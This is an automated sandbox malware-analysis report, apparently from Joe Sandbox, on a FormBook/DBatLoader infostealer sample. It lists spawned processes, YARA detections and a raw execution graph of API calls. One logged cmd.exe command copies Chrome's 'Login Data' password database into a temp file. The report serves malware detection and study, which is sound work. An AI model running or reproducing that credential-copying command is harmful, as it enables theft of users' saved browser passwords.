                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000011.00000000.397308343.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000000.400048444.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000000.400048444.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000000.400048444.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.429108861.00000000005D0000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.429108861.00000000005D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.429108861.00000000005D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:low

                          Chronological Activities

                          Analysis Process: help.exe PID: 6656 Parent PID: 3352

                          General

                          Start time:20:23:11
                          Start date:13/01/2022
                          Path:C:\Windows\SysWOW64\help.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\help.exe
                          Imagebase:0xa50000
                          File size:10240 bytes
                          MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.556874060.0000000002B10000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.556874060.0000000002B10000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.556874060.0000000002B10000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000014.00000002.558403513.0000000002FA0000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.559355148.0000000003070000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.559355148.0000000003070000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.559355148.0000000003070000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:moderate

                          Chronological Activities

                          Analysis Process: Hyrzbcwcas.exe PID: 6340 Parent PID: 7108

                          General

                          Start time:20:23:17
                          Start date:13/01/2022
                          Path:C:\Users\user\Contacts\Hyrzbcwcas.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\Contacts\Hyrzbcwcas.exe
                          Imagebase:0x400000
                          File size:807424 bytes
                          MD5 hash:58B39C2620CDDA3D3FA6A125F476FC9F
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000015.00000000.416006494.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000015.00000000.417791279.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000000.418862410.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000000.418862410.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000000.418862410.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.436930793.00000000008F0000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.436930793.00000000008F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.436930793.00000000008F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000015.00000000.417110071.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000000.419325156.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000000.419325156.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000000.419325156.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.436845866.00000000008C0000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.436845866.00000000008C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.436845866.00000000008C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000015.00000000.415275359.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.436315053.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.436315053.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.436315053.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000001.419503342.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000001.419503342.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000001.419503342.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:low

                          Chronological Activities

                          Analysis Process: cmd.exe PID: 5628 Parent PID: 3352

                          General

                          Start time:20:23:20
                          Start date:13/01/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\cmd.exe
                          Imagebase:0xd80000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.431106841.0000000003000000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.431106841.0000000003000000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.431106841.0000000003000000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:high

                          Chronological Activities

                          Analysis Process: cmd.exe PID: 4324 Parent PID: 6656

                          General

                          Start time:20:23:20
                          Start date:13/01/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
                          Imagebase:0xd80000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: conhost.exe PID: 5848 Parent PID: 4324

                          General

                          Start time:20:23:21
                          Start date:13/01/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7f20f0000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: help.exe PID: 5832 Parent PID: 3352

                          General

                          Start time:20:23:21
                          Start date:13/01/2022
                          Path:C:\Windows\SysWOW64\help.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\help.exe
                          Imagebase:0xa50000
                          File size:10240 bytes
                          MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.437292259.0000000002AD0000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.437292259.0000000002AD0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.437292259.0000000002AD0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:moderate

                          Chronological Activities

                          Disassembly

                          Code Analysis

                          Reset < >

                            Analysis Process: WZ454554.exe PID: 6936 Parent PID: 6628 WZ454554.exeCOMMON

                            Execution Graph

                            Execution Coverage:5.3%
                            Dynamic/Decrypted Code Coverage:2.7%
                            Signature Coverage:5.8%
                            Total number of Nodes:550
                            Total number of Limit Nodes:69

                            Graph

                            execution_graph 25140 41f0c0 25143 41b940 25140->25143 25144 41b966 25143->25144 25151 409d40 25144->25151 25146 41b972 25147 41b993 25146->25147 25159 40c1c0 25146->25159 25149 41b985 25195 41a680 25149->25195 25198 409c90 25151->25198 25153 409d54 25153->25146 25154 409d4d 25154->25153 25210 409c30 25154->25210 25160 40c1e5 25159->25160 25623 40b1c0 25160->25623 25162 40c23c 25627 40ae40 25162->25627 25164 40c262 25194 40c4b3 25164->25194 25636 4143a0 25164->25636 25166 40c2a7 25166->25194 25639 408a60 25166->25639 25168 40c2eb 25168->25194 25646 41a4d0 25168->25646 25172 40c341 25173 40c348 25172->25173 25658 419fe0 25172->25658 25175 41bda0 2 API calls 25173->25175 25177 40c355 25175->25177 25177->25149 25178 40c392 25179 41bda0 2 API calls 25178->25179 25180 40c399 25179->25180 25180->25149 25181 40c3a2 25182 40f4a0 3 API calls 25181->25182 25183 40c416 25182->25183 25183->25173 25184 40c421 25183->25184 25185 41bda0 2 API calls 25184->25185 25186 40c445 25185->25186 25663 41a030 25186->25663 25189 419fe0 2 API calls 25190 40c480 25189->25190 25190->25194 25668 419df0 25190->25668 25193 41a680 2 API calls 25193->25194 25194->25149 25196 41a69f ExitProcess 25195->25196 25197 41af30 LdrLoadDll 25195->25197 25197->25196 25199 409ca3 25198->25199 25249 418b90 LdrLoadDll 25198->25249 25229 418a40 25199->25229 25202 409cb6 25202->25154 25203 409cac 25203->25202 25232 41b280 25203->25232 25205 409cf3 25205->25202 25243 409ab0 25205->25243 25207 409d13 25250 409620 LdrLoadDll 25207->25250 25209 409d25 25209->25154 25211 409c4a 25210->25211 25212 41b570 LdrLoadDll 25210->25212 25595 41b570 25211->25595 25212->25211 25215 41b570 LdrLoadDll 25216 409c71 25215->25216 25217 40f180 25216->25217 25218 40f199 25217->25218 25603 40b040 25218->25603 25220 40f1ac 25607 41a1b0 25220->25607 25224 40f1d2 25225 40f1fd 25224->25225 25616 41a230 25224->25616 25227 41a460 2 API calls 25225->25227 25228 409d65 25227->25228 25228->25146 25251 41a5d0 25229->25251 25233 41b299 25232->25233 25264 414a50 25233->25264 25235 41b2b1 25236 41b2ba 25235->25236 25303 41b0c0 25235->25303 25236->25205 25238 41b2ce 25238->25236 25321 419ed0 25238->25321 25246 409aca 25243->25246 25573 407ea0 25243->25573 25245 409ad1 25245->25207 25246->25245 25586 408160 25246->25586 25249->25199 25250->25209 25254 41af30 25251->25254 25253 418a55 25253->25203 25255 41af40 25254->25255 25256 41af62 25254->25256 25258 414e50 25255->25258 25256->25253 25259 414e6a 25258->25259 25260 414e5e 25258->25260 25259->25256 25260->25259 25263 4152d0 LdrLoadDll 25260->25263 25262 414fbc 25262->25256 25263->25262 25265 414d85 25264->25265 25266 414a64 25264->25266 25265->25235 25266->25265 25329 419c20 25266->25329 25269 414b90 25332 41a330 25269->25332 25270 414b73 25389 41a430 LdrLoadDll 25270->25389 25273 414b7d 25273->25235 25274 414bb7 25275 41bda0 2 API calls 25274->25275 25278 414bc3 25275->25278 25276 414d49 25277 41a460 2 API calls 25276->25277 25280 414d50 25277->25280 25278->25273 25278->25276 25279 414d5f 25278->25279 25283 414c52 25278->25283 25398 414790 LdrLoadDll NtReadFile NtClose 25279->25398 25280->25235 25282 414d72 25282->25235 25284 414cb9 25283->25284 25286 414c61 25283->25286 25284->25276 25285 414ccc 25284->25285 25391 41a2b0 25285->25391 25288 414c66 25286->25288 25289 414c7a 25286->25289 25390 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 25288->25390 25292 414c97 25289->25292 25293 414c7f 25289->25293 25292->25280 25347 414410 25292->25347 25335 4146f0 25293->25335 25296 414c70 25296->25235 25297 414c8d 25297->25235 25299 414d2c 25395 41a460 25299->25395 25300 414caf 25300->25235 25302 414d38 25302->25235 25304 41b0d1 25303->25304 25305 41b0e3 25304->25305 25417 41bd20 25304->25417 25305->25238 25307 41b104 25420 414070 25307->25420 25309 41b150 25309->25238 25310 41b127 25310->25309 25311 414070 3 API calls 25310->25311 25313 41b149 25311->25313 25313->25309 25445 415390 25313->25445 25314 41b1da 25315 41b1ea 25314->25315 25540 41aed0 LdrLoadDll 25314->25540 25455 41ad40 25315->25455 25318 41b218 25535 419e90 25318->25535 25322 419eec 25321->25322 25323 41af30 LdrLoadDll 25321->25323 25567 af967a 25322->25567 25323->25322 25324 419f07 25326 41bda0 25324->25326 25570 41a640 25326->25570 25328 41b329 25328->25205 25330 41af30 LdrLoadDll 25329->25330 25331 414b44 25330->25331 25331->25269 25331->25270 25331->25273 25333 41af30 LdrLoadDll 25332->25333 25334 41a34c NtCreateFile 25333->25334 25334->25274 25336 41470c 25335->25336 25337 41a2b0 LdrLoadDll 25336->25337 25338 41472d 25337->25338 25339 414734 25338->25339 25340 414748 25338->25340 25341 41a460 2 API calls 25339->25341 25342 41a460 2 API calls 25340->25342 25344 41473d 25341->25344 25343 414751 25342->25343 25399 41bfb0 LdrLoadDll RtlAllocateHeap 25343->25399 25344->25297 25346 41475c 25346->25297 25348 41445b 25347->25348 25349 41448e 25347->25349 25350 41a2b0 LdrLoadDll 25348->25350 25351 4145d9 25349->25351 25355 4144aa 25349->25355 25352 414476 25350->25352 25353 41a2b0 LdrLoadDll 25351->25353 25354 41a460 2 API calls 25352->25354 25361 4145f4 25353->25361 25356 41447f 25354->25356 25357 41a2b0 LdrLoadDll 25355->25357 25356->25300 25358 4144c5 25357->25358 25359 4144e1 25358->25359 25360 4144cc 25358->25360 25365 4144e6 25359->25365 25366 4144fc 25359->25366 25364 41a460 2 API calls 25360->25364 25412 41a2f0 LdrLoadDll 25361->25412 25363 41462e 25367 41a460 2 API calls 25363->25367 25368 4144d5 25364->25368 25369 41a460 2 API calls 25365->25369 25375 414501 25366->25375 25400 41bf70 25366->25400 25370 414639 25367->25370 25368->25300 25371 4144ef 25369->25371 25370->25300 25371->25300 25374 414567 25376 41457e 25374->25376 25411 41a270 LdrLoadDll 25374->25411 25382 414513 25375->25382 25403 41a3e0 25375->25403 25378 414585 25376->25378 25379 41459a 25376->25379 25380 41a460 2 API calls 25378->25380 25381 41a460 2 API calls 25379->25381 25380->25382 25384 4145a3 25381->25384 25382->25300 25383 4145cf 25383->25300 25384->25383 25406 41bb70 25384->25406 25386 4145ba 25387 41bda0 2 API calls 25386->25387 25388 4145c3 25387->25388 25388->25300 25389->25273 25390->25296 25392 414d14 25391->25392 25393 41af30 LdrLoadDll 25391->25393 25394 41a2f0 LdrLoadDll 25392->25394 25393->25392 25394->25299 25396 41a47c NtClose 25395->25396 25397 41af30 LdrLoadDll 25395->25397 25396->25302 25397->25396 25398->25282 25399->25346 25413 41a600 25400->25413 25402 41bf88 25402->25375 25404 41a3fc NtReadFile 25403->25404 25405 41af30 LdrLoadDll 25403->25405 25404->25374 25405->25404 25407 41bb94 25406->25407 25408 41bb7d 25406->25408 25407->25386 25408->25407 25409 41bf70 2 API calls 25408->25409 25410 41bbab 25409->25410 25410->25386 25411->25376 25412->25363 25414 41a616 25413->25414 25415 41af30 LdrLoadDll 25414->25415 25416 41a61c RtlAllocateHeap 25415->25416 25416->25402 25418 41bd4d 25417->25418 25541 41a510 25417->25541 25418->25307 25421 414081 25420->25421 25423 414089 25420->25423 25421->25310 25422 41435c 25422->25310 25423->25422 25544 41cf10 25423->25544 25425 4140dd 25426 41cf10 2 API calls 25425->25426 25430 4140e8 25426->25430 25427 414136 25429 41cf10 2 API calls 25427->25429 25432 41414a 25429->25432 25430->25427 25549 41cfb0 25430->25549 25431 41cf10 2 API calls 25434 4141bd 25431->25434 25432->25431 25433 41cf10 2 API calls 25442 414205 25433->25442 25434->25433 25436 414334 25556 41cf70 LdrLoadDll RtlFreeHeap 25436->25556 25438 41433e 25557 41cf70 LdrLoadDll RtlFreeHeap 25438->25557 25440 414348 25558 41cf70 LdrLoadDll RtlFreeHeap 25440->25558 25555 41cf70 LdrLoadDll RtlFreeHeap 25442->25555 25443 414352 25559 41cf70 LdrLoadDll RtlFreeHeap 25443->25559 25446 4153a1 25445->25446 25447 414a50 8 API calls 25446->25447 25449 4153b7 25447->25449 25448 41540a 25448->25314 25449->25448 25450 4153f2 25449->25450 25451 415405 25449->25451 25452 41bda0 2 API calls 25450->25452 25453 41bda0 2 API calls 25451->25453 25454 4153f7 25452->25454 25453->25448 25454->25314 25456 41ad43 25455->25456 25560 41ac00 25456->25560 25459 41ac00 LdrLoadDll 25460 41ad5d 25459->25460 25461 41ac00 LdrLoadDll 25460->25461 25462 41ad66 25461->25462 25463 41ac00 LdrLoadDll 25462->25463 25464 41ad6f 25463->25464 25465 41ac00 LdrLoadDll 25464->25465 25466 41ad78 25465->25466 25467 41ac00 LdrLoadDll 25466->25467 25468 41ad81 25467->25468 25469 41ac00 LdrLoadDll 25468->25469 25470 41ad8d 25469->25470 25471 41ac00 LdrLoadDll 25470->25471 25472 41ad96 25471->25472 25473 41ac00 LdrLoadDll 25472->25473 25474 41ad9f 25473->25474 25475 41ac00 LdrLoadDll 25474->25475 25476 41ada8 25475->25476 25477 41ac00 LdrLoadDll 25476->25477 25478 41adb1 25477->25478 25479 41ac00 LdrLoadDll 25478->25479 25480 41adba 25479->25480 25481 41ac00 LdrLoadDll 25480->25481 25482 41adc6 25481->25482 25483 41ac00 LdrLoadDll 25482->25483 25484 41adcf 25483->25484 25485 41ac00 LdrLoadDll 25484->25485 25486 41add8 25485->25486 25487 41ac00 LdrLoadDll 25486->25487 25488 41ade1 25487->25488 25489 41ac00 LdrLoadDll 25488->25489 25490 41adea 25489->25490 25491 41ac00 LdrLoadDll 25490->25491 25492 41adf3 25491->25492 25493 41ac00 LdrLoadDll 25492->25493 25494 41adff 25493->25494 25495 41ac00 LdrLoadDll 25494->25495 25496 41ae08 25495->25496 25497 41ac00 LdrLoadDll 25496->25497 25498 41ae11 25497->25498 25499 41ac00 LdrLoadDll 25498->25499 25500 41ae1a 25499->25500 25501 41ac00 LdrLoadDll 25500->25501 25502 41ae23 25501->25502 25503 41ac00 LdrLoadDll 25502->25503 25504 41ae2c 25503->25504 25505 41ac00 LdrLoadDll 25504->25505 25506 41ae38 25505->25506 25507 41ac00 LdrLoadDll 25506->25507 25508 41ae41 25507->25508 25509 41ac00 LdrLoadDll 25508->25509 25510 41ae4a 25509->25510 25511 41ac00 LdrLoadDll 25510->25511 25512 41ae53 25511->25512 25513 41ac00 LdrLoadDll 25512->25513 25514 41ae5c 25513->25514 25515 41ac00 LdrLoadDll 25514->25515 25516 41ae65 25515->25516 25517 41ac00 LdrLoadDll 25516->25517 25518 41ae71 25517->25518 25519 41ac00 LdrLoadDll 25518->25519 25520 41ae7a 25519->25520 25521 41ac00 LdrLoadDll 25520->25521 25522 41ae83 25521->25522 25523 41ac00 LdrLoadDll 25522->25523 25524 41ae8c 25523->25524 25525 41ac00 LdrLoadDll 25524->25525 25526 41ae95 25525->25526 25527 41ac00 LdrLoadDll 25526->25527 25528 41ae9e 25527->25528 25529 41ac00 LdrLoadDll 25528->25529 25530 41aeaa 25529->25530 25531 41ac00 LdrLoadDll 25530->25531 25532 41aeb3 25531->25532 25533 41ac00 LdrLoadDll 25532->25533 25534 41aebc 25533->25534 25534->25318 25536 41af30 LdrLoadDll 25535->25536 25537 419eac 25536->25537 25566 af9860 LdrInitializeThunk 25537->25566 25538 419ec3 25538->25238 25540->25315 25542 41a52c NtAllocateVirtualMemory 25541->25542 25543 41af30 LdrLoadDll 25541->25543 25542->25418 25543->25542 25545 41cf20 25544->25545 25546 41cf26 25544->25546 25545->25425 25547 41bf70 2 API calls 25546->25547 25548 41cf4c 25547->25548 25548->25425 25550 41cfd5 25549->25550 25551 41d00d 25549->25551 25552 41bf70 2 API calls 25550->25552 25551->25430 25553 41cfea 25552->25553 25554 41bda0 2 API calls 25553->25554 25554->25551 25555->25436 25556->25438 25557->25440 25558->25443 25559->25422 25561 41ac1b 25560->25561 25562 414e50 LdrLoadDll 25561->25562 25563 41ac3b 25562->25563 25564 414e50 LdrLoadDll 25563->25564 25565 41ace7 25563->25565 25564->25565 25565->25459 25566->25538 25568 af968f LdrInitializeThunk 25567->25568 25569 af9681 25567->25569 25568->25324 25569->25324 25571 41af30 LdrLoadDll 25570->25571 25572 41a65c RtlFreeHeap 25571->25572 25572->25328 25574 407eb0 25573->25574 25575 407eab 25573->25575 25576 41bd20 2 API calls 25574->25576 25575->25246 25583 407ed5 25576->25583 25577 407f38 25577->25246 25578 419e90 2 API calls 25578->25583 25579 407f3e 25580 407f64 25579->25580 25582 41a590 2 API calls 25579->25582 25580->25246 25584 407f55 25582->25584 25583->25577 25583->25578 25583->25579 25585 41bd20 2 API calls 25583->25585 25589 41a590 25583->25589 25584->25246 25585->25583 25587 41a590 2 API calls 25586->25587 25588 40817e 25587->25588 25588->25207 25590 41af30 LdrLoadDll 25589->25590 25591 41a5ac 25590->25591 25594 af96e0 LdrInitializeThunk 25591->25594 25592 41a5c3 25592->25583 25594->25592 25596 41b593 25595->25596 25599 40acf0 25596->25599 25600 40ad14 25599->25600 25601 40ad50 LdrLoadDll 25600->25601 25602 409c5b 25600->25602 25601->25602 25602->25215 25604 40b063 25603->25604 25606 40b0e0 25604->25606 25621 419c60 LdrLoadDll 25604->25621 25606->25220 25608 41af30 LdrLoadDll 25607->25608 25609 40f1bb 25608->25609 25609->25228 25610 41a7a0 25609->25610 25611 41af30 LdrLoadDll 25610->25611 25612 41a7bf LookupPrivilegeValueW 25611->25612 25612->25224 25613 41a7f1 25612->25613 25614 41af30 LdrLoadDll 25613->25614 25615 41a7ff 25614->25615 25615->25224 25617 41af30 LdrLoadDll 25616->25617 25618 41a24c 25617->25618 25622 af9910 LdrInitializeThunk 25618->25622 25619 41a26b 25619->25225 25621->25606 25622->25619 25624 40b1f0 25623->25624 25625 40b040 LdrLoadDll 25624->25625 25626 40b204 25625->25626 25626->25162 25628 40ae51 25627->25628 25629 40ae4d 25627->25629 25630 40ae6a 25628->25630 25631 40ae9c 25628->25631 25629->25164 25673 419ca0 LdrLoadDll 25630->25673 25674 419ca0 LdrLoadDll 25631->25674 25633 40aead 25633->25164 25635 40ae8c 25635->25164 25637 40f4a0 3 API calls 25636->25637 25638 4143c6 25637->25638 25638->25166 25675 4087a0 25639->25675 25642 408a9d 25642->25168 25643 4087a0 19 API calls 25644 408a8a 25643->25644 25644->25642 25693 40f710 10 API calls 25644->25693 25647 41af30 LdrLoadDll 25646->25647 25648 41a4ec 25647->25648 25812 af98f0 LdrInitializeThunk 25648->25812 25649 40c322 25651 40f4a0 25649->25651 25652 40f4bd 25651->25652 25813 419f90 25652->25813 25655 40f505 25655->25172 25656 419fe0 2 API calls 25657 40f52e 25656->25657 25657->25172 25659 419ffc 25658->25659 25660 41af30 LdrLoadDll 25658->25660 25819 af9780 LdrInitializeThunk 25659->25819 25660->25659 25661 40c385 25661->25178 25661->25181 25664 41af30 LdrLoadDll 25663->25664 25665 41a04c 25664->25665 25820 af97a0 LdrInitializeThunk 25665->25820 25666 40c459 25666->25189 25669 41af30 LdrLoadDll 25668->25669 25670 419e0c 25669->25670 25821 af9a20 LdrInitializeThunk 25670->25821 25671 40c4ac 25671->25193 25673->25635 25674->25633 25676 407ea0 4 API calls 25675->25676 25691 4087ba 25675->25691 25676->25691 25677 408a49 25677->25642 25677->25643 25678 408a3f 25679 408160 2 API calls 25678->25679 25679->25677 25682 419ed0 2 API calls 25682->25691 25684 41a460 LdrLoadDll NtClose 25684->25691 25687 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 25687->25691 25690 419df0 2 API calls 25690->25691 25691->25677 25691->25678 25691->25682 25691->25684 25691->25687 25691->25690 25694 419ce0 25691->25694 25697 4085d0 25691->25697 25709 40f5f0 LdrLoadDll NtClose 25691->25709 25710 419d60 LdrLoadDll 25691->25710 25711 419d90 LdrLoadDll 25691->25711 25712 419e20 LdrLoadDll 25691->25712 25713 4083a0 25691->25713 25729 405f60 LdrLoadDll 25691->25729 25693->25642 25695 41af30 LdrLoadDll 25694->25695 25696 419cfc 25695->25696 25696->25691 25698 4085e6 25697->25698 25730 419850 25698->25730 25700 4085ff 25705 408771 25700->25705 25751 4081a0 25700->25751 25702 4086e5 25703 4083a0 11 API calls 25702->25703 25702->25705 25704 408713 25703->25704 25704->25705 25706 419ed0 2 API calls 25704->25706 25705->25691 25707 408748 25706->25707 25707->25705 25708 41a4d0 2 API calls 25707->25708 25708->25705 25709->25691 25710->25691 25711->25691 25712->25691 25714 4083c9 25713->25714 25791 408310 25714->25791 25717 41a4d0 2 API calls 25718 4083dc 25717->25718 25718->25717 25719 408467 25718->25719 25721 408462 25718->25721 25799 40f670 25718->25799 25719->25691 25720 41a460 2 API calls 25722 40849a 25720->25722 25721->25720 25722->25719 25723 419ce0 LdrLoadDll 25722->25723 25724 4084ff 25723->25724 25724->25719 25803 419d20 25724->25803 25726 408563 25726->25719 25727 414a50 8 API calls 25726->25727 25728 4085b8 25727->25728 25728->25691 25729->25691 25731 41bf70 2 API calls 25730->25731 25732 419867 25731->25732 25758 409310 25732->25758 25734 419882 25735 4198c0 25734->25735 25736 4198a9 25734->25736 25738 41bd20 2 API calls 25735->25738 25737 41bda0 2 API calls 25736->25737 25739 4198b6 25737->25739 25740 4198fa 25738->25740 25739->25700 25741 41bd20 2 API calls 25740->25741 25742 419913 25741->25742 25748 419bb4 25742->25748 25764 41bd60 25742->25764 25745 419ba0 25746 41bda0 2 API calls 25745->25746 25747 419baa 25746->25747 25747->25700 25749 41bda0 2 API calls 25748->25749 25750 419c09 25749->25750 25750->25700 25752 40829f 25751->25752 25753 4081b5 25751->25753 25752->25702 25753->25752 25754 414a50 8 API calls 25753->25754 25755 408222 25754->25755 25756 41bda0 2 API calls 25755->25756 25757 408249 25755->25757 25756->25757 25757->25702 25759 409335 25758->25759 25760 40acf0 LdrLoadDll 25759->25760 25761 409368 25760->25761 25763 40938d 25761->25763 25767 40cf20 25761->25767 25763->25734 25785 41a550 25764->25785 25768 40cf4c 